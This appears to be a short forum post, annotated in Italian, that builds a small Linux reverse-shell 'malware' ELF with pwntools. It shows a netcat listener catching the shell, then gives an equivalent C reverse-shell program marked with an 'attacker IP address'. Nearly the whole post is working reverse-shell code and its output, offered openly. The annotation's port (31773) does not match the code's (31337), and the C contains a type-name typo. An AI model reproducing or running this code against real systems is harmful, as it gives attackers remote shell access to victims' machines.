#!/usr/bin/python3
import os, random, subprocess, string
from pwn import *
ipaddr = '127.0.0.1'
port = 31337
outfile = 'connectback'
context(arch='x86_64')
code = shellcraft.socket(network='ipv4', proto='tcp')
code += shellcraft.connect(ipaddr, port, network='ipv4')
code += shellcraft.dup2('rbp', 0)
code += shellcraft.dup2('rbp', 1)
code += shellcraft.dup2('rbp', 2)
code += shellcraft.sh()
elf = ELF.from_assembly(code)
elf.save('lnxmw1')
;piccolo malware elf creato con python e con la libreria pwntools
./lnxmw1.py
[*] '/tmp/pwn-asm-02ut4aj4/step3'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffff000)
RWX: Has RWX segments
./lnxmw1
nc -l 31337
whoami
re
ls -lrt
total 20
-rwxrwxr-x 1 re re 794 Apr 12 09:28 restatic.py
-rw-rw-r-- 1 re re 70 Apr 12 10:29 gamma.sh
-rwxrwxr-x 1 re re 447 Apr 12 16:07 lnxmw1.py
-rwxrwxr-x 1 re re 4784 Apr 12 16:07 lnxmw1
;esecuzione del malware con server netcat in ascolto sulla porta 31773; il malware crea una reverse shell nel server in ascolto
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
int main () {
// attacker IP address
const char* ip = "127.0.0.1";
// address struct
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
inet_aton(ip, &addr.sin_addr);
// socket syscall
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
// connect syscall
connect(sockfd, (struct sockadr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++) {
// dup2(sockftd, 0) - stdin
// dup2(sockfd, 1) - stdout
// dup2(sockfd, 2) - stderr
dup2(sockfd, i);
}
// execve syscall
execve("/bin/sh", NULL, NULL);
return 0;
}
;codice equivalente in C
Edited by AKIRA BASHO - 2/5/2023, 17:00
